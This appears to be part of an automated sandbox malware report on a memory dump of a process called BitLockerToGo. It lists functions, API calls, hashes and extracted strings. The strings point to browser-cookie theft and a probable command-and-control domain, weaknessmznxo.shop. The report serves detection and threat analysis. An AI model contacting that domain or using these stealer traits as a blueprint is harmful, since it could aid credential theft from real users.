}, xrefs: 02A0B5FE
U, xrefs: 02A0B4BE
9, xrefs: 02A0BA25
?, xrefs: 02A0B386
n, xrefs: 02A0B92B
K, xrefs: 02A0B52E
w, xrefs: 02A0B59E
G, xrefs: 02A0BA2D
I, xrefs: 02A0B55E
=, xrefs: 02A0B376
H, xrefs: 02A0BA55
', xrefs: 02A0B6F8
H, xrefs: 02A0B4CE
w, xrefs: 02A0B61E
r, xrefs: 02A0B953
I, xrefs: 02A0B51E
], xrefs: 02A0B720
_, xrefs: 02A0B730
o, xrefs: 02A0B5EE
9, xrefs: 02A0B356
{, xrefs: 02A0B923
W, xrefs: 02A0B50E
^, xrefs: 02A0B738
o, xrefs: 02A0BB97
j, xrefs: 02A0B60E

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "$'$9$9$;$=$?$G$H$H$H$I$I$I$K$K$N$P$Q$R$S$S$T$U$W$Y$]$^$_$a$f$h$i$j$n$o$o$p$p$r$u$v$w$w${$}
API String ID: 0-3428971038
Opcode ID: 054139abad4c57735c6b855d2ee21928d5630900420f1badff68bbbf87f3be7f
Instruction ID: cc332c65a9f676419c3eed08f20c2f2f846c8cea91b0c4525ceb0d091d5f4c3f
Opcode Fuzzy Hash: 054139abad4c57735c6b855d2ee21928d5630900420f1badff68bbbf87f3be7f
Instruction Fuzzy Hash: BE52023010C7C18AD336CB28959879FBFE16BA6328F084E5DE0E95B2D2C7B58545CB67

Function 02A27970 Relevance: 27.3, APIs: 4, Strings: 10, Instructions: 2817COMMON

Download Yara Rule

Strings

3: , xrefs: 02A29365
\3*, xrefs: 02A27B67
zeJy, xrefs: 02A27B99
twj], xrefs: 02A27BA3
Tw;., xrefs: 02A27B7B
E\_j, xrefs: 02A27B49
#/33, xrefs: 02A2936F
RRIP, xrefs: 02A27B53
/}2 , xrefs: 02A28092
$-xS, xrefs: 02A27B85

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #/33$$-xS$/}2 $3: $E\_j$RRIP$Tw;.$\3*$twj]$zeJy
API String ID: 0-232789478
Opcode ID: a43efb9b239e53e2a796d3572fc3df23fce679b748382c2d1ba3b7a611c09a3b
Instruction ID: 5ebdfa84a7ffbea4b9402d2201c5efc283c0f9a2f541e796c73d0ef9bd070091
Opcode Fuzzy Hash: a43efb9b239e53e2a796d3572fc3df23fce679b748382c2d1ba3b7a611c09a3b
Instruction Fuzzy Hash: B3238B70104B918EE329CF39C5947A3FBE2BF56304F58895DD4EB8B682CB79A409CB54

Function 02A16E50 Relevance: 14.5, APIs: 1, Strings: 7, Instructions: 500
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

f8 <, xrefs: 02A16EF8
?2)$, xrefs: 02A16F48
5 , xrefs: 02A16F10
.(.#, xrefs: 02A16F00
119,, xrefs: 02A16F08
60&+, xrefs: 02A16EF0
f, xrefs: 02A16F17

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: .(.#$119,$5 $60&+$?2)$$f$f8 <
API String ID: 0-168083567
Opcode ID: af70753b3ace7f26e12e80ecdb0b5fdd2fce84a2ec6df7ee3777ae2d2461d0b5
Instruction ID: 9964c4bce14a91d67c79f8974d054ed62920ffc6ea621f0cc5e1459eaa985d55
Opcode Fuzzy Hash: af70753b3ace7f26e12e80ecdb0b5fdd2fce84a2ec6df7ee3777ae2d2461d0b5
Instruction Fuzzy Hash: 3F029BB19083418FD714CF28D891A2BF7E2FFC5314F145A6CE9998B291DB35D906CB92

Function 02A2F570 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserCallbackDispatcher.NTDLL ref: 02A2F5BA
GetSystemMetrics.USER32 ref: 02A2F5CD
DeleteObject.GDI32 ref: 02A2F637
SelectObject.GDI32 ref: 02A2F689
SelectObject.GDI32 ref: 02A2F6FC
DeleteObject.GDI32 ref: 02A2F736

Strings

, xrefs: 02A2F6CB

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: Object$DeleteSelect$CallbackDispatcherMetricsSystemUser
String ID:
API String ID: 1449868515-3916222277
Opcode ID: e5d72e12cd8427a714d714eee74b35c89a625c24eddeb17c7fa3d16212164508
Instruction ID: 6916f10bfe1bcdb66925afa89fb78502e4f1d913a67443a2b1cc63fb88cc0a8b
Opcode Fuzzy Hash: e5d72e12cd8427a714d714eee74b35c89a625c24eddeb17c7fa3d16212164508
Instruction Fuzzy Hash: 5AA16DB4A097849FD360DF24D68878BBBF0BBD9308F90895DE5889B340DB749559CF82

Function 02A09FA0 Relevance: 11.7, Strings: 9, Instructions: 453
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

%', xrefs: 02A0A48F
0, xrefs: 02A0A016
P, xrefs: 02A0A254
+<;(, xrefs: 02A0A244
3 8', xrefs: 02A0A288
+49>, xrefs: 02A0A24C
NM, xrefs: 02A0A593
J, xrefs: 02A0A346
MJV#, xrefs: 02A0A2F8

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: +49>$+<;($0$3 8'$J$MJV#$NM$P$%'
API String ID: 0-3871528633
Opcode ID: d29b6e51af1a5817a252c115fa0e131e3419c4b6a233ccc19f336a55248392ac
Instruction ID: 54afacfa993055390d6ad051058232c55d23f48c58b050fc8b98c093df4d3c64
Opcode Fuzzy Hash: d29b6e51af1a5817a252c115fa0e131e3419c4b6a233ccc19f336a55248392ac
Instruction Fuzzy Hash: BE0223B0208381ABD318CF14D590B6BBBE2FBC5744F54992DE5C98B392DB34D909CB56

Function 02A29EF2 Relevance: 9.8, APIs: 1, Strings: 4, Instructions: 1006COMMON

Download Yara Rule

Strings

gxyz, xrefs: 02A2A02F
)"b#, xrefs: 02A2AB3C
|FX?, xrefs: 02A2AA09
"L:d, xrefs: 02A2A5BE

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: "L:d$)"b#$gxyz$|FX?
API String ID: 0-3601850346
Opcode ID: 522a6f6048afc58874fa40387825a9eba86880364ccae302731b70ebb6c5e567
Instruction ID: 5322614d09a735a1e590b369565c980e0cf621518c1c2feb946c315d10043e5b
Opcode Fuzzy Hash: 522a6f6048afc58874fa40387825a9eba86880364ccae302731b70ebb6c5e567
Instruction Fuzzy Hash: 9C72BE70504B518BE339CF29C5947A3BBE2AF55308F148A6DC4E78BA97CB39E449CB50

Function 02A18A72 Relevance: 9.2, Strings: 7, Instructions: 480
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

0m>s, xrefs: 02A18E48, 02A18E9A
EK, xrefs: 02A18AE5
MS, xrefs: 02A18AF5
XY, xrefs: 02A18B11
0m>s, xrefs: 02A18B4E
[info] collected cookies file of the chromium-based browser, xrefs: 02A18D16
RQ, xrefs: 02A18E02

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: 0m>s$0m>s$RQ$XY$[info] collected cookies file of the chromium-based browser$EK$MS
API String ID: 0-1744010354
Opcode ID: b39541fd6e38ff45d6ab9a110b0b968baaad30d66630d193aacf0456e362c43c
Instruction ID: b255cc9a8f6683dd178fd9829d330e609c34690e7a826a80a6009788d4bb53ab
Opcode Fuzzy Hash: b39541fd6e38ff45d6ab9a110b0b968baaad30d66630d193aacf0456e362c43c
Instruction Fuzzy Hash: 3BF1BE715083418FD728CF14C89076BB7E2FFC6324F148A5DE8DA9B281EB799505CB96

Function 02A18184 Relevance: 7.8, Strings: 6, Instructions: 297
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

#;~#, xrefs: 02A1839B
=& s, xrefs: 02A18393
r, xrefs: 02A183DA
bm'3, xrefs: 02A18408
4$$(, xrefs: 02A1838B
40z4, xrefs: 02A183A3

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: #;~#$4$$($40z4$=& s$bm'3$r
API String ID: 0-1136624806
Opcode ID: 774b699d2a3a69addc782122abdfa92591870f5876ba84e23b774f21e9afdee5
Instruction ID: 2db290d3013822810ab8d5a44814d5dcb31e9fcd51a7c2564c93740055fa8410
Opcode Fuzzy Hash: 774b699d2a3a69addc782122abdfa92591870f5876ba84e23b774f21e9afdee5
Instruction Fuzzy Hash: 1EB1B3716083818FD725CF29C4907ABBBE2EFD6318F18496DD4D98B382DB399506CB52

Function 02A17CBB Relevance: 6.6, Strings: 5, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

]_, xrefs: 02A17CC5
HI, xrefs: 02A17F63
Y[, xrefs: 02A17CCD
LM, xrefs: 02A17E97
AC, xrefs: 02A17E7F

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: HI$LM$AC$Y[$]_
API String ID: 0-894271490
Opcode ID: 902558ca37d9964fd06abd5d13405a216170ae64b8d8ea25b68685ec920856cb
Instruction ID: 94357664905cd641830a2606655390a7eccc2be03b9003dc512bf1ec23552f88
Opcode Fuzzy Hash: 902558ca37d9964fd06abd5d13405a216170ae64b8d8ea25b68685ec920856cb
Instruction Fuzzy Hash: 02D178726183848BD714CF16C88065FBBE2FFC6314F488A1CE8959B395DB74DA09CB86

Function 02A23840 Relevance: 5.4, Strings: 4, Instructions: 365COMMON

Download Yara Rule

Strings

M|, xrefs: 02A23A8E
BM, xrefs: 02A23AA2
VB, xrefs: 02A23A87
d{, xrefs: 02A23A98

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: BM$M|$VB$d{
API String ID: 0-4262012137
Opcode ID: c405f17b584ac977538cc720a7f538d01479950c537c68fb3830011a16bd2053
Instruction ID: 40fa8155c70a3c359dc014b74eef08d2ae86b6acfd6b434a93d1b234b798653e
Opcode Fuzzy Hash: c405f17b584ac977538cc720a7f538d01479950c537c68fb3830011a16bd2053
Instruction Fuzzy Hash: 8EC189B5904B80CFE324CF29D891B16BBE2FB8A344F544D2DD1DA87690DB36E456CB81

Function 02A21D60 Relevance: 4.0, Strings: 3, Instructions: 269COMMON

Download Yara Rule

Strings

|AvC, xrefs: 02A21FA6
*YX[, xrefs: 02A21F76
=]+_, xrefs: 02A21F6E

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: *YX[$=]+_$|AvC
API String ID: 0-3033963198
Opcode ID: 1012c80ad53dd59e750dcd5c67388c02ba39c45155c9c59d7b4a7d5988e97b3f
Instruction ID: c06046fe7df30f5174dcf59519598365726408ebf585fd8912ef2842c6ec4553
Opcode Fuzzy Hash: 1012c80ad53dd59e750dcd5c67388c02ba39c45155c9c59d7b4a7d5988e97b3f
Instruction Fuzzy Hash: AF9197B15083409BD314CF18C891B6BBBF1EF85798F148A1DF4D98B2A1E778D909CB86

Function 02A34340 Relevance: 3.9, APIs: 1, Strings: 1, Instructions: 422COMMON

Download Yara Rule

APIs

GetVolumeInformationW.KERNELBASE(7BAD7941,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02A3446D

Strings

gxyz, xrefs: 02A3481A

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: InformationVolume
String ID: gxyz
API String ID: 2039140958-2474275795
Opcode ID: 3ff277f881a52cc6580042472854bb8d4e71df21cf013cbe1bd24d9524724012
Instruction ID: 9c12eca96890894bf7a7b6af941640d17b43c605f605c94f544c6ab3e8312479
Opcode Fuzzy Hash: 3ff277f881a52cc6580042472854bb8d4e71df21cf013cbe1bd24d9524724012
Instruction Fuzzy Hash: 23E1D075A08741CFD725CF28D880B2AB7F2EF89308F54892CF5954B691DB76E815CB81

Function 02A04E70 Relevance: 2.9, Strings: 2, Instructions: 397COMMON

Download Yara Rule

Strings

IEND, xrefs: 02A052D1
), xrefs: 02A04EE3

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: )$IEND
API String ID: 0-707183367
Opcode ID: 78538f6221593af019f8044212b5c73d66c8043d203e3fef4441e465db0816b2
Instruction ID: 5952a38cd2cc84df870d4cf2f327c5429d620a1784fa32eda4a41519303baf56
Opcode Fuzzy Hash: 78538f6221593af019f8044212b5c73d66c8043d203e3fef4441e465db0816b2
Instruction Fuzzy Hash: C6E19DB1A083449FD710DF28E88475ABBE1BF98304F44492DF9959B3C1DB79E908CB82

Function 02A22C10 Relevance: 2.9, Strings: 2, Instructions: 385COMMON

Download Yara Rule

Strings

{'~s, xrefs: 02A23003
avub, xrefs: 02A22FFB

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: avub${'~s
API String ID: 2994545307-4052730433
Opcode ID: a0e5b1f05a7d729158c5f3ec2270c0c20076a046cb8d100cdc5658384645ae7e
Instruction ID: 8460eb2ff467c53f96d9966309175bfced2aac63dff69f62a2c5cd3ad65bd32c
Opcode Fuzzy Hash: a0e5b1f05a7d729158c5f3ec2270c0c20076a046cb8d100cdc5658384645ae7e
Instruction Fuzzy Hash: 46C19F71A083219FD714CF18C99076BB7E2EBC5714F18892DE8858B381EB38DD59DB92

Function 02A3A088 Relevance: 2.7, Strings: 2, Instructions: 230COMMON

Download Yara Rule

Strings

gxyz, xrefs: 02A3A0D9
gxyz, xrefs: 02A39FDB

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: gxyz$gxyz
API String ID: 0-4102614194
Opcode ID: d0b792f52a0e52d7828f020a94a60f3adbe6bad68558dfe77d7daa4f7e45b4e1
Instruction ID: c3ceae83fdebfcb2d3e4bd092cff2efde0c915068ecf12a87cd60f1fac8bbaf9
Opcode Fuzzy Hash: d0b792f52a0e52d7828f020a94a60f3adbe6bad68558dfe77d7daa4f7e45b4e1
Instruction Fuzzy Hash: 6E816978644701CFD325CF29D890B22B7F2FB8A704F14886CE5D68B696DB36E856CB40

Function 02A37F70 Relevance: 2.7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

Strings

gxyz, xrefs: 02A37FB6
[-V#, xrefs: 02A37F74

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: [-V#$gxyz
API String ID: 0-859779740
Opcode ID: a7372afbb69cfe2f47bc9b95e493d8380864007f96074430b7e49b9462da973c
Instruction ID: d37131221512dc68b933b8e482c50409f62ef0414dd4172f7da5ec2608553cda
Opcode Fuzzy Hash: a7372afbb69cfe2f47bc9b95e493d8380864007f96074430b7e49b9462da973c
Instruction Fuzzy Hash: 8551CE75A083019FD715DF18D880B2AB7E2BBC5708F158A2DF6848B241EB35D815CB96

Function 02A0F290 Relevance: 1.5, Strings: 1, Instructions: 297COMMON

Download Yara Rule

Strings

weaknessmznxo.shop, xrefs: 02A0F750

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID: weaknessmznxo.shop
API String ID: 0-4067726560
Opcode ID: 3978eb019d6cdb296f03d9583815e8774dddc372261abe48c6e05f5062301205
Instruction ID: f15ed1c934effc33d386515899cb22138b56139e7b69dbf5e572484661bcbebc
Opcode Fuzzy Hash: 3978eb019d6cdb296f03d9583815e8774dddc372261abe48c6e05f5062301205
Instruction Fuzzy Hash: E3B173B055D3D18BD331CF14C494B9FBBE1BBC2308F185A5CE8D86B285CB7599058BA6

Function 02A39870 Relevance: 1.5, APIs: 1, Instructions: 12libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(02A3BFFC,005C003F,00000006,?,005C003F,00000018,A8A9AEAF,00000000,?), ref: 02A39896

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction ID: 9a2a3e30e6272c7ba4599b7d5b49d8b1df743313db24dc7d28a19b0c9381744b
Opcode Fuzzy Hash: 3af67e3b8a4cf002b2d8122619789f5e408d063de0ae60c6913db66b84c766ee
Instruction Fuzzy Hash: 82D04875908216AB9A09CF44C54040EFBE6BFC4714F228C8EA88873214C3B0BD46EB82

Function 02A3C020 Relevance: 1.4, Strings: 1, Instructions: 144COMMON

Download Yara Rule

Strings

@, xrefs: 02A3C0CD

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 050d76eda378311c0941f36f8ff664b02cc6157e3b596722cbccff1937c77c2d
Instruction ID: a3c8710f0fc7db784ee88f014659fde0d7838ca354567fe845ea8f494b711225
Opcode Fuzzy Hash: 050d76eda378311c0941f36f8ff664b02cc6157e3b596722cbccff1937c77c2d
Instruction Fuzzy Hash: D941CDB55083008FD301DF18DC90B2AB7F2EF85328F048A1DF4989B291EB39D919CB96

Function 02A1154C Relevance: .8, Instructions: 768COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9a8736c01de4bd97718d48e4585191aef55e52838119076f280c0afdb2cebd
Instruction ID: f7652c6094c817a89fe56dc578c5e7d6fbc74809f1fe07dc8daef3d8ae4f5bd8
Opcode Fuzzy Hash: 1c9a8736c01de4bd97718d48e4585191aef55e52838119076f280c0afdb2cebd
Instruction Fuzzy Hash: 79424874600B018FD725CF29D990B62B7E2FF4A314F04896CD9AA8B7A1EB75F805CB54

Function 02A12846 Relevance: .6, Instructions: 632COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4708c22a2574a266bed80f31c6539c4c70ba06efc9e56156041c79725e41f26
Instruction ID: 30084f23be5927edfd91a61f221f5cf78ddc0c7cf070b02a05d9bb3ea005a459
Opcode Fuzzy Hash: f4708c22a2574a266bed80f31c6539c4c70ba06efc9e56156041c79725e41f26
Instruction Fuzzy Hash: 31227BB5600B018FD725CF28D990B66B7E2FF89314F08896DD8AA8B791DB35F845CB50

Function 02A3A59A Relevance: .6, Instructions: 584COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9432ebb0e8b75d841236edc8bd0e0144d76b724b38e1268037711d0adef168d0
Instruction ID: 4da7d136d4dca5379930de7d12a58bf8920bba29690e53f908d4b4600a5612ec
Opcode Fuzzy Hash: 9432ebb0e8b75d841236edc8bd0e0144d76b724b38e1268037711d0adef168d0
Instruction Fuzzy Hash: 4B22A379A04641CFC728CF28D490626B7F2FF8A314B198A6DD496C7792DB36E852CF50

Function 02A3C7E0 Relevance: .2, Instructions: 245COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a593d1a360a2c2f8108c79a75006b03c331435d918e5eef391a2fc99bcbac65
Instruction ID: e224ef055f33fa427c5a9e8c4b5d298c0dd408d2263631eea0e3a244fd14661f
Opcode Fuzzy Hash: 8a593d1a360a2c2f8108c79a75006b03c331435d918e5eef391a2fc99bcbac65
Instruction Fuzzy Hash: 0D81BC75A083129BC715DF18C890B6AB7E2FF84724F15891DF585AB260DB31ED60CB82

Function 02A2B2EB Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2065e02d7f57bc9bf369feedf0156d550dc1c13fa7cfd4da30778ed7bd3d1a7a
Instruction ID: 443cda7f38e0fca1e8a0276f5fd005055ca98986b5f09a30e8a0f36f63d0fc51
Opcode Fuzzy Hash: 2065e02d7f57bc9bf369feedf0156d550dc1c13fa7cfd4da30778ed7bd3d1a7a
Instruction Fuzzy Hash: 9061F8B0914B00AFD364DF2DC95AB57BBE8EB49360F104A5DF9AA87390D7316810CBD6

Function 02A3C2D0 Relevance: .2, Instructions: 163COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a68f2bd06fb604a76e4a991fd5baffc6637eb9f22064fa34d7702ba279239102
Instruction ID: 1a4e42b5008ea1e3b3b7f63c4ef0464f2b615351a0bf9f0c9e96e3bdde67c7f9
Opcode Fuzzy Hash: a68f2bd06fb604a76e4a991fd5baffc6637eb9f22064fa34d7702ba279239102
Instruction Fuzzy Hash: 0D51C9756183019FD315DF28CC80B6AB7E2EFC5728F14881EF598AB281DB35E825CB46

Function 02A2B85E Relevance: 29.8, APIs: 1, Strings: 16, Instructions: 82
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 02A2B92D

Strings

S, xrefs: 02A2B8B4
A, xrefs: 02A2B86C
Y, xrefs: 02A2B88C
m, xrefs: 02A2B8BC
8, xrefs: 02A2B8A8
W, xrefs: 02A2B8A4
], xrefs: 02A2B87C
:, xrefs: 02A2B888
_, xrefs: 02A2B884
U, xrefs: 02A2B89C
R, xrefs: 02A2B8B8
0, xrefs: 02A2B880
b, xrefs: 02A2B8B0
Q, xrefs: 02A2B8AC
[, xrefs: 02A2B894
C, xrefs: 02A2B874

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: AllocString
String ID: 0$8$:$A$C$Q$R$S$U$W$Y$[$]$_$b$m
API String ID: 2525500382-4138873195
Opcode ID: 83e0c02dbe4e8ef041d646d6fc2bb2e29a702bc64294bf4d51d2b6ea1ad91b38
Instruction ID: 19d7b6558afcec19cc78c6e82bfa6b32f0a47db9d54fcaab3503b6aecfd78376
Opcode Fuzzy Hash: 83e0c02dbe4e8ef041d646d6fc2bb2e29a702bc64294bf4d51d2b6ea1ad91b38
Instruction Fuzzy Hash: 8C41C570108B80CEE715CF28C494756BFE0AB56308F08899DD8998F397C7B9E559CBA2

Function 02A094D0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32 ref: 02A095D4

Strings

system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways, xrefs: 02A0958F

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: ExitProcess
String ID: system or character via spellings glyphs a is uses that in their modified other on often reflection or resemblance on it leetspeak, used similarity internet. play eleet the of the replacements of primarily ways
API String ID: 621844428-780655312
Opcode ID: 151c3fddc2f87802a473c1ca5d6055726d0662f842a854f596948c263b6ad570
Instruction ID: 1f5489e062fa346bb2b928c31a35424fa129d0a1b00c2592351c39e9d45df9ba
Opcode Fuzzy Hash: 151c3fddc2f87802a473c1ca5d6055726d0662f842a854f596948c263b6ad570
Instruction Fuzzy Hash: 0E214AB08082128AD710BF76F68832F7AF4AB41B54F004919E995961C2DFBAD15DCFD3

Function 02A0A640 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 880
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE ref: 02A0A7F2
GetProcessVersion.KERNEL32 ref: 02A0AB78

Strings

weaknessmznxo.shop, xrefs: 02A0AB01, 02A0B1D3

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: LibraryLoadProcessVersion
String ID: weaknessmznxo.shop
API String ID: 1829952579-4067726560
Opcode ID: 506e53c0b8608be2508cfb08909959829ea849915f49d9b84cc9247e365dcc8f
Instruction ID: 16abec9909c428dba3cf736af9815025fbf6c5f833631f55b3b6f5bfbb1d5fb1
Opcode Fuzzy Hash: 506e53c0b8608be2508cfb08909959829ea849915f49d9b84cc9247e365dcc8f
Instruction Fuzzy Hash: CE928F70508B80CED321CF38D584756BFE1AB16318F058A9DD4EA8B7E2D775E44ACB62

Function 02A108AF Relevance: 3.1, APIs: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?), ref: 02A107B9
GetSystemDirectoryW.KERNEL32(?,00000104), ref: 02A1083B

Memory Dump Source

Source File: 00000001.00000002.1845000210.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2a00000_BitLockerToGo.jbxd

Similarity

API ID: DirectorySystem
String ID:
API String ID: 2188284642-0
